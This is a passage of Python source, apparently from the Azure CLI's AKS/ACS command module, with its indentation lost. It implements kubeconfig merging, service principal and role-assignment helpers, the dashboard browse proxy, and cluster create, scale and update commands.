if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
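# Example (non-deterministic): _rand_str(4) might return something like 'k3x9',
# drawing lowercase letters and digits from random.SystemRandom.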
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
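# Note: on Python 3.2+ the same effect is available as
# os.makedirs(path, exist_ok=True); the EAFP variant above follows the recipe
# linked in the comment and also works on older interpreters.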
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
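# Illustrative call (placeholder secret): _build_application_creds(password='s3cr3t')
# returns one PasswordCredential valid from now until one year later and no key
# credentials; passing key_value instead yields a KeyCredential with the default
# type 'AsymmetricX509Cert' and usage 'Verify'. Passing both raises a CLIError.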
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
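# Sketch of the scope strings produced (subscription id is a placeholder):
#   scope provided                      -> returned unchanged
#   resource_group_name='my-rg' only    -> '/subscriptions/<sub-id>/resourceGroups/my-rg'
#   neither provided                    -> '/subscriptions/<sub-id>'
# Supplying both scope and resource_group_name raises a CLIError.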
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
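# Example: _resolve_role_id('Network Contributor', scope, definitions_client)
# returns the full role-definition resource id ending in the role's GUID (the
# same GUID that subnet_role_assignment_exists below checks for); passing a GUID
# directly short-circuits the lookup.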
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
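# Minimal sketch of _update_dict semantics, a shallow merge where dict2 wins:
#   _update_dict({'count': 1, 'vmSize': 'Standard_D2_v2'}, {'count': 3})
#   == {'count': 3, 'vmSize': 'Standard_D2_v2'}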
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
raise CLIError('Cannot find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if b'unknown flag: --address' in err.output:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
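# Illustrative behaviour: _trim_nodepoolname('') returns 'nodepool1', while
# _trim_nodepoolname('averylongnodepoolname') returns 'averylongnod' (first 12 chars).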
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role '
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
# Skip creating a service principal profile for the cluster if the cluster
# uses managed identity and the customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not (enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
api_server_access_profile=api_server_access_profile,
identity=identity
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add the AAD session key to the request headers.
# If principal_obj is None (which can happen when the cluster uses managed
# identity), the header is not needed and is simply omitted.
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach the ACR to it, '
'you can manually grant permission to the identity named <CLUSTER_NAME>-agentpool '
'in the MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
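# The keys above are the names accepted by --addons on the CLI and the values are
# the addon profile keys stored on the managed cluster, e.g. 'monitoring' maps to
# the 'omsagent' profile used by _add_monitoring_role_assignment above.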
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There is more than one node pool in the cluster. '
'Please specify the node pool name, or use the "az aks nodepool" command to scale a node pool.')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
